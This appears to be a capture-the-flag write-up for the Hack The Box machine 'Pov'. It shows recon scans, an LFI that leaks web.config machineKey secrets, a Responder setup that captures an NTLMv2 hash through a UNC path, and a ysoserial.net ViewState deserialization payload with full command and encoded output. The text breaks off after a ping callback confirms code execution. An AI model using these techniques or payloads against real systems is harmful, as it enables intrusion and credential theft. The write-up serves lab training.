Pov
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# nmap 10.129.230.183 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-11 08:31 EST
Nmap scan report for 10.129.230.183
Host is up (0.087s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# nmap 10.129.230.183 -p 80 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-11 08:32 EST
Nmap scan report for 10.129.230.183
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds
1.1.2. Subdomain brute force
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://pov.htb/ -H "Host: FUZZ.pov.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://pov.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.pov.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 822ms]
:: Progress: [4989/4989] :: Job [1/1] :: 458 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
The virtual host dev.pov.htb exists: with auto-calibration (-ac) filtering the default response, it is the only name that answers differently (302).
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# dirsearch -u pov.htb -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/pov/reports/_pov.htb/_25-12-11_09-00-53.txt
Target: http://pov.htb/
[09:00:59] Starting:
[09:01:00] 301 - 141B - /js -> http://pov.htb/js/
[09:01:19] 301 - 142B - /css -> http://pov.htb/css/
[09:01:20] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[09:01:25] 301 - 142B - /img -> http://pov.htb/img/
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[09:01:26] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[09:01:26] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[09:01:26] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[09:01:26] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[09:01:26] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# dirsearch -u dev.pov.htb -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/pov/reports/_dev.pov.htb/_25-12-11_09-02-18.txt
Target: http://dev.pov.htb/
[09:02:24] Starting:
[09:02:26] 302 - 188B - /%C0%AE%C0%AE%C0%AF -> http://dev.pov.htb/portfolio/%C3%80%C2%AE%C3%80%C2%AE%C3%80%C2%AF
[09:02:26] 302 - 148B - /%3f/ -> /default.aspx?aspxerrorpath=/?/
[09:02:26] 302 - 158B - /%ff -> http://dev.pov.htb/portfolio/%C3%BF
[09:02:33] 302 - 153B - /a%5c.aspx -> /default.aspx?aspxerrorpath=/a/.aspx
[09:02:33] 302 - 164B - /account/login.aspx -> /default.aspx?aspxerrorpath=/account/login.aspx
[09:02:33] 302 - 165B - /accounts/login.aspx -> /default.aspx?aspxerrorpath=/accounts/login.aspx
[09:02:34] 302 - 167B - /adm/admloginuser.aspx -> /default.aspx?aspxerrorpath=/adm/admloginuser.aspx
[09:02:34] 302 - 160B - /adm/index.aspx -> /default.aspx?aspxerrorpath=/adm/index.aspx
[09:02:34] 302 - 155B - /admin%20/ -> /default.aspx?aspxerrorpath=/admin%20/
[09:02:35] 302 - 152B - /admin. -> /default.aspx?aspxerrorpath=/admin.
[09:02:35] 302 - 164B - /admin/account.aspx -> /default.aspx?aspxerrorpath=/admin/account.aspx
[09:02:35] 302 - 168B - /admin/admin-login.aspx -> /default.aspx?aspxerrorpath=/admin/admin-login.aspx
[09:02:35] 302 - 162B - /admin/admin.aspx -> /default.aspx?aspxerrorpath=/admin/admin.aspx
[09:02:35] 302 - 168B - /admin/admin_login.aspx -> /default.aspx?aspxerrorpath=/admin/admin_login.aspx
[09:02:35] 302 - 167B - /admin/adminLogin.aspx -> /default.aspx?aspxerrorpath=/admin/adminLogin.aspx
[09:02:35] 302 - 169B - /admin/controlpanel.aspx -> /default.aspx?aspxerrorpath=/admin/controlpanel.aspx
[09:02:35] 302 - 159B - /admin/cp.aspx -> /default.aspx?aspxerrorpath=/admin/cp.aspx
[09:02:35] 302 - 227B - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:35] 302 - 208B - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:35] 302 - 211B - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:35] 302 - 204B - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:35] 302 - 161B - /admin/home.aspx -> /default.aspx?aspxerrorpath=/admin/home.aspx
[09:02:35] 302 - 162B - /admin/index.aspx -> /default.aspx?aspxerrorpath=/admin/index.aspx
[09:02:35] 302 - 162B - /admin/login.aspx -> /default.aspx?aspxerrorpath=/admin/login.aspx
[09:02:35] 302 - 163B - /admin2/index.aspx -> /default.aspx?aspxerrorpath=/admin2/index.aspx
[09:02:35] 302 - 163B - /admin2/login.aspx -> /default.aspx?aspxerrorpath=/admin2/login.aspx
[09:02:36] 302 - 167B - /admin_area/admin.aspx -> /default.aspx?aspxerrorpath=/admin_area/admin.aspx
[09:02:36] 302 - 167B - /admin_area/index.aspx -> /default.aspx?aspxerrorpath=/admin_area/index.aspx
[09:02:36] 302 - 167B - /admin_area/login.aspx -> /default.aspx?aspxerrorpath=/admin_area/login.aspx
[09:02:38] 302 - 166B - /adminarea/index.aspx -> /default.aspx?aspxerrorpath=/adminarea/index.aspx
[09:02:38] 302 - 166B - /adminarea/admin.aspx -> /default.aspx?aspxerrorpath=/adminarea/admin.aspx
[09:02:38] 302 - 166B - /adminarea/login.aspx -> /default.aspx?aspxerrorpath=/adminarea/login.aspx
[09:02:38] 302 - 169B - /admincontrol/login.aspx -> /default.aspx?aspxerrorpath=/admincontrol/login.aspx
[09:02:38] 302 - 164B - /admincp/index.aspx -> /default.aspx?aspxerrorpath=/admincp/index.aspx
[09:02:39] 302 - 164B - /admincp/login.aspx -> /default.aspx?aspxerrorpath=/admincp/login.aspx
[09:02:39] 302 - 172B - /administrator/account.aspx -> /default.aspx?aspxerrorpath=/administrator/account.aspx
[09:02:39] 302 - 170B - /administrator/index.aspx -> /default.aspx?aspxerrorpath=/administrator/index.aspx
[09:02:39] 302 - 170B - /administrator/login.aspx -> /default.aspx?aspxerrorpath=/administrator/login.aspx
[09:02:42] 302 - 153B - /asset.. -> /default.aspx?aspxerrorpath=/asset..
[09:02:42] 302 - 161B - /auth/login.aspx -> /default.aspx?aspxerrorpath=/auth/login.aspx
[09:02:42] 302 - 165B - /bb-admin/index.aspx -> /default.aspx?aspxerrorpath=/bb-admin/index.aspx
[09:02:42] 302 - 165B - /bb-admin/admin.aspx -> /default.aspx?aspxerrorpath=/bb-admin/admin.aspx
[09:02:42] 302 - 165B - /bb-admin/login.aspx -> /default.aspx?aspxerrorpath=/bb-admin/login.aspx
[09:02:44] 302 - 198B - /ckeditor/ckfinder/core/connector/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/ckeditor/ckfinder/core/connector/aspx/connector.aspx
[09:02:48] 302 - 223B - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console -> /default.aspx?aspxerrorpath=/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[09:02:49] 302 - 165B - /exchange/logon.aspx -> /default.aspx?aspxerrorpath=/exchange/logon.aspx
[09:02:49] 302 - 164B - /exchange/root.aspx -> /default.aspx?aspxerrorpath=/exchange/root.aspx
[09:02:50] 302 - 221B - /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:50] 302 - 205B - /fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:50] 302 - 202B - /fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:50] 302 - 198B - /fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:53] 302 - 169B - /include/config.inc.aspx -> /default.aspx?aspxerrorpath=/include/config.inc.aspx
[09:02:53] 302 - 207B - /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:53] 302 - 230B - /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:53] 302 - 211B - /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:53] 302 - 214B - /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:53] 302 - 156B - /index.php. -> /default.aspx?aspxerrorpath=/index.php.
[09:02:54] 302 - 163B - /iwa/iwa_test.aspx -> /default.aspx?aspxerrorpath=/iwa/iwa_test.aspx
[09:02:54] 302 - 168B - /iwa/authenticated.aspx -> /default.aspx?aspxerrorpath=/iwa/authenticated.aspx
[09:02:54] 302 - 170B - /javax.faces.resource.../ -> /default.aspx?aspxerrorpath=/javax.faces.resource.../
[09:02:54] 302 - 260B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[09:02:54] 302 - 227B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/* -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[09:02:54] 302 - 237B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[09:02:54] 302 - 253B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[09:02:54] 302 - 234B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[09:02:54] 302 - 201B - /jolokia/exec/java.lang:type=Memory/gc -> /default.aspx?aspxerrorpath=/jolokia/exec/java.lang:type=Memory/gc
[09:02:54] 302 - 255B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[09:02:54] 302 - 209B - /jolokia/read/java.lang:type=*/HeapMemoryUsage -> /default.aspx?aspxerrorpath=/jolokia/read/java.lang:type=*/HeapMemoryUsage
[09:02:54] 302 - 221B - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used -> /default.aspx?aspxerrorpath=/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[09:02:54] 302 - 252B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[09:02:54] 302 - 214B - /jolokia/write/java.lang:type=Memory/Verbose/true -> /default.aspx?aspxerrorpath=/jolokia/write/java.lang:type=Memory/Verbose/true
[09:02:54] 302 - 202B - /jolokia/search/*:j2eeType=J2EEServer,* -> /default.aspx?aspxerrorpath=/jolokia/search/*:j2eeType=J2EEServer,*
[09:02:56] 302 - 163B - /login/cpanel.aspx -> /default.aspx?aspxerrorpath=/login/cpanel.aspx
[09:02:56] 302 - 156B - /login.wdm%2e -> /default.aspx?aspxerrorpath=/login.wdm.
[09:02:56] 302 - 162B - /logon/logon.aspx -> /default.aspx?aspxerrorpath=/logon/logon.aspx
[09:02:57] 302 - 163B - /member/login.aspx -> /default.aspx?aspxerrorpath=/member/login.aspx
[09:02:58] 302 - 164B - /members/login.aspx -> /default.aspx?aspxerrorpath=/members/login.aspx
[09:02:58] 302 - 168B - /modelsearch/index.aspx -> /default.aspx?aspxerrorpath=/modelsearch/index.aspx
[09:02:58] 302 - 168B - /modelsearch/admin.aspx -> /default.aspx?aspxerrorpath=/modelsearch/admin.aspx
[09:02:58] 302 - 168B - /modelsearch/login.aspx -> /default.aspx?aspxerrorpath=/modelsearch/login.aspx
[09:02:59] 302 - 166B - /moderator/admin.aspx -> /default.aspx?aspxerrorpath=/moderator/admin.aspx
[09:02:59] 302 - 166B - /moderator/login.aspx -> /default.aspx?aspxerrorpath=/moderator/login.aspx
[09:03:00] 302 - 166B - /nsw/admin/login.aspx -> /default.aspx?aspxerrorpath=/nsw/admin/login.aspx
[09:03:00] 302 - 162B - /Orion/Login.aspx -> /default.aspx?aspxerrorpath=/Orion/Login.aspx
[09:03:01] 302 - 174B - /pages/admin/admin-login.aspx -> /default.aspx?aspxerrorpath=/pages/admin/admin-login.aspx
[09:03:01] 302 - 177B - /panel-administracion/admin.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/admin.aspx
[09:03:01] 302 - 177B - /panel-administracion/index.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/index.aspx
[09:03:01] 302 - 177B - /panel-administracion/login.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/login.aspx
[09:03:05] 302 - 158B - /rating_over. -> /default.aspx?aspxerrorpath=/rating_over.
[09:03:05] 302 - 171B - /Reports/Pages/Folder.aspx -> /default.aspx?aspxerrorpath=/Reports/Pages/Folder.aspx
[09:03:05] 302 - 182B - /ReportServer/Pages/ReportViewer.aspx -> /default.aspx?aspxerrorpath=/ReportServer/Pages/ReportViewer.aspx
[09:03:06] 302 - 206B - /scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
[09:03:09] 302 - 166B - /siteadmin/login.aspx -> /default.aspx?aspxerrorpath=/siteadmin/login.aspx
[09:03:09] 302 - 166B - /siteadmin/index.aspx -> /default.aspx?aspxerrorpath=/siteadmin/index.aspx
[09:03:09] 302 - 172B - /sitecore/content/home.aspx -> /default.aspx?aspxerrorpath=/sitecore/content/home.aspx
[09:03:09] 302 - 173B - /sitecore/login/default.aspx -> /default.aspx?aspxerrorpath=/sitecore/login/default.aspx
[09:03:10] 302 - 154B - /static.. -> /default.aspx?aspxerrorpath=/static..
[09:03:13] 302 - 185B - /umbraco/webservices/codeEditorSave.asmx -> /default.aspx?aspxerrorpath=/umbraco/webservices/codeEditorSave.asmx
[09:03:13] 302 - 161B - /user/login.aspx -> /default.aspx?aspxerrorpath=/user/login.aspx
[09:03:14] 302 - 162B - /users/login.aspx -> /default.aspx?aspxerrorpath=/users/login.aspx
[09:03:14] 302 - 167B - /VirtualEms/Login.aspx -> /default.aspx?aspxerrorpath=/VirtualEms/Login.aspx
[09:03:14] 302 - 167B - /virtualems/Login.aspx -> /default.aspx?aspxerrorpath=/virtualems/Login.aspx
[09:03:15] 302 - 155B - /WEB-INF./ -> /default.aspx?aspxerrorpath=/WEB-INF./
[09:03:15] 302 - 165B - /webadmin/admin.aspx -> /default.aspx?aspxerrorpath=/webadmin/admin.aspx
[09:03:15] 302 - 165B - /webadmin/index.aspx -> /default.aspx?aspxerrorpath=/webadmin/index.aspx
[09:03:16] 302 - 165B - /webadmin/login.aspx -> /default.aspx?aspxerrorpath=/webadmin/login.aspx
Task Completed
pov.htb is a static site (only /js, /css and /img), so there is little to test there; dev.pov.htb is the priority. Every non-existent path on dev.pov.htb redirects to /default.aspx?aspxerrorpath=..., which is ASP.NET custom-error behaviour, so this is an ASP.NET Web Forms application. The 400s and 302s for the /jolokia and /docpicker entries are just the wordlist's Java-application probes bouncing off IIS, not real findings.
1.2. web
ASP.NET is shown in bold on the page, which I suspect is a hint.
Further down there is an even more obvious hint.
The CV can also be viewed, and it shows that this person does web development, not security.
1.3. LFI
There is a "download CV" function; intercepting the request shows a file parameter.
Change it to something else and see what happens.
Set it to the site's default page, default.aspx.
That is returned too, so the parameter reads arbitrary files from the server.
This is indeed an LFI.
Since this is Windows and an ASP.NET site, the obvious first target is web.config; if you want to dig further, use a wordlist of Windows/IIS file paths.
web.config contains a machineKey, so .NET deserialization through ViewState is worth a shot.
web.config:
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
The request parameters include __VIEWSTATE, a standard ASP.NET Web Forms field and a very common deserialization sink.
The file parameter can also be abused for NTLM sniffing: point it at a UNC path so the server authenticates to our SMB server, and capture the Net-NTLMv2 (or NTLMv1) challenge-response of the account the application runs as.
Start Responder listening, then replace the file value with our SMB server address (file=\\10.10.14.87\shares, as in the request shown later).
┌──(root㉿kali)-[~]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.87]
Responder IPv6 [dead:beef:2::1055]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-DKONXBWL56I]
Responder Domain Name [BX1C.LOCAL]
Responder DCE-RPC Port [46486]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.230.183
[SMB] NTLMv2-SSP Username : POV\sfitz
[SMB] NTLMv2-SSP Hash : sfitz::POV:1122334455667788:[hash value omitted]
We obtained the Net-NTLMv2 hash of the user sfitz.
Try cracking it.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SFITZ::POV:1122334455667788:0ebe7fa93ad813c756469cb...000000
Time.Started.....: Thu Dec 11 23:21:53 2025 (1 sec)
Time.Estimated...: Thu Dec 11 23:21:54 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 18803.1 kH/s (2.39ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14344388/14344388 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 48c Util: 16% Core:1890MHz Mem:8001MHz Bus:8
Started: Thu Dec 11 23:21:47 2025
Stopped: Thu Dec 11 23:21:54 2025
Cracking failed: hashcat mode 5600 (NetNTLMv2) exhausted rockyou.txt with no match.
1.4. .NET deserialization
Earlier we read the site's web.config through the LFI. It contains the machineKey, the key material used to encrypt and validate ViewState; with it we can build a ViewState that deserializes to a gadget chain of our choosing.
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
>>>> <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
In the <system.web> node, <machineKey> defines the encryption and validation settings: AES for encryption, SHA1 for the validation MAC, with both keys given in the file. These keys are what protect forms-authentication tickets and ViewState; once an attacker has them, the MAC check no longer distinguishes the server's own ViewState from an attacker's.
For .NET deserialization the go-to tool is ysoserial.net.
First generate a payload that runs a ping command, to test whether the chain works at all. The --path and --apppath values must match the page being posted to, because in .NET 4.5 mode the ViewState MAC key is derived from purpose strings that include the page's path.
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping -n 4 10.10.14.87 " --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
WLvMAvIJX%2Fk4hmEq1M%2B%2FFlKCXEIn49bz6xa8zfxjPVs7n%2FypgiicAasUQkm2pxIUb60VUQEo9LT6ro29cQQ25AhtBnMF1HxBUmr4%2BAYXbTsViejOdKNCliy17BPNtx1Bmnvv8q63zORnF%2Bor2YjNa%2FHmrMkAV7%2B6JFwbSeCtR0pUJ6A53a2H3kYXxWrH%2Bzj%2BawjCyZOk%2Bfz4Wa2G8hX4OHoIsVA0mR8VRA%2FVKgj75QjNn8Oux4LJ5rRoM2adECkAvVSH3YQgsqIII%2FqG5ZBrIY6zlPlYZuQqjJrXc7mQF9cVHN1m1ZNlsaHhbp8uGCy6oKBplfBxQNCks%2BQTLRnJiM%2BN195VxciwzReM1rIGGA4uOxaxdIUVbXTXuTV%2F3Espi6K94VBPECf%2Bd3BkiSwy079%2F5%2BD0vTJRqP3uQ2P6%2F900wnMTAyAQarYsvUPplEXnwfRusl0Q%2FITcr7xo7vlJ87Nu3naBQIh%2Ftam4hH809VPpaBryvsT4qxeeRue4DxF%2BL6AmLG6cb8vuKGYrpS%2FZl%2BF0zsqVjiY%2Fivi%2Fw5RkwTXQ1YGlfddMTLCMhJS1SERDtKP2%2BNeqzRLu4GwXgofyXHkjt6WDkvMp3bEf30DZkkotnPW3es1siYqXGnHfdrO%2FZ8QpRCoQNtETvKbFe%2F9WjmVZ27ObCXLl9W63B3LiXZw82%2FJJgkpiAIyBXj2De%2Ba%2Fa%2BKIs9ucDYuaf71UxTd83mCkChmS8qzzH7K9gzTYRKBorFCnZok8aAt4PDvl25Ep8tk4jkbFrwfLV441M7ziyLox1JMWJ35OFW0V9J5Gr%2BplaDWMApJbnpgzeh3nP3jGY7g8QHetyO8ApQHThWbqdH%2FJthaVt7oUJCZOPzrp8xkodNCnAskacxisC7XTGs8RXO2uNDPA608lVcnq5oZ73aGoz1FM8oizzq2eu2YIySfEj4r5R%2B%2BysUbcs2K7%2Fps3UDSGZDG0jXpptySJk43Fz%2F2No3%2Bwji1pzkRst15dM%2F8Z6BCdTi%2BTy5YU32KyHjqf6fZ1J%2F6zJE%2F3XiAUR%2FTWIFGFFpmkFhGM4heoKtrUoqcDUeV5J6AUnnuBZPFDyk9sWcC5JW9y6gsJyLsfjKwaTkroBfYEd%2F47b1UOMKzbozc48PE%2FFcM749O58P0V8Mt%2BxFeTF7d6RrYjF%2BN83%2BAqDHUoEV3eL%2FAPUv%2FC7gM0tcyMtIRvwJNP6iT4aoKwAhPaWvqkGEqCSpIs2YmRfGDeVHnsRGo9%2BAHHoLuooIOVs4Bti0vY1N%2F%2B3YvQSH7OVrimNthWDfnX3VESdp1xEe81b%2B8FC2Y%3D
On Kali, listen for ICMP with tshark.
┌──(root㉿kali)-[~]
└─# tshark -i tun0 -f icmp
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
1 0.000000000 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=1/256, ttl=127
2 0.000034000 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=1/256, ttl=64 (request in 1)
3 1.028914337 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=2/512, ttl=127
4 1.028937737 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=2/512, ttl=64 (request in 3)
5 2.043117433 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=3/768, ttl=127
